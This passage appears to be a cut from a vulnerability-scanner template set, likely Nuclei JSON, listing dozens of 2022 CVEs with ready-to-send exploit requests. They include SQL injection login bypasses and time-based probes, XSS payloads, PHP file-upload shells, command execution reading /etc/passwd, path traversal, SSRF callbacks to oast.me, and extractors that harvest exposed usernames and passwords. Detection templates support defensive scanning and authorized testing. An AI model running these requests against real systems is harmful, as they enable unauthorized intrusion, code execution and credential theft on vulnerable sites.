charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, '<title>index</title>')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, '<title>index</title>')"],"condition":"and"}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 15s\nGET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-45269","info":{"name":"Linx Sphere - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Component Based Setup"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1580","info":{"name":"Site Offline WP Plugin < 1.5.3 - Authorization Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["Site Offline Or Coming Soon Or Maintenance Mode"]}]},{"method":"GET","path":["{{BaseURL}}/?admin"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"wp-block\", \"author\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site 